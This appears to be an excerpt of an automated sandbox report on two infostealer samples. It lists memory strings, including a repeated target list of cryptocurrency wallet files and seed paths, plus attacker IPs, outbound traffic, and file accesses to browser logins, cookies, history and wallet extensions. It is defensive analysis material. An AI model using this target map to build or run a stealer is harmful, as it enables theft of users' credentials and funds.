Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json*0
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 16.113s\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\.
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16er\AppData\Roaming\\Electrum-LTC\wallets\\..*

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.6:50093 -> 176.53.146.212:80

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
